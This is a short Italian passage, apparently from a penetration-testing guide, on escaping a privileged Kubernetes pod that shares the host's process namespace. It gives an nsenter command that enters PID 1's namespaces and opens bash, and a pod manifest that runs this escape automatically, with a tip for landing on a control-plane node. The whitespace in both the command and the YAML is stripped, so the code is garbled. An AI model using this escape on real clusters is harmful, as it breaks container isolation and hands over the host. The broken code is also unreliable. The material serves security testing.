Con questi privilegi avrai accesso ai processi dell'host e abbastanza privilegi per entrare all'interno dello spazio dei nomi di uno dei processi dell'host.
Nota che potresti potenzialmente non aver bisogno di privilegiati ma solo di alcune capacità e di altri bypass di difese potenziali (come apparmor e/o seccomp).
Basta eseguire qualcosa di simile a quanto segue per poter fuggire dal pod:
nsenter--target1--mount--uts--ipc--net--pid--bash
Esempio di configurazione:
apiVersion:v1kind:Podmetadata:name:priv-and-hostpid-exec-podlabels:app:pentestspec:hostPID:truecontainers:- name:priv-and-hostpid-podimage:ubuntutty:truesecurityContext:privileged:truecommand: [ "nsenter","--target","1","--mount","--uts","--ipc","--net","--pid","--","bash" ]#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name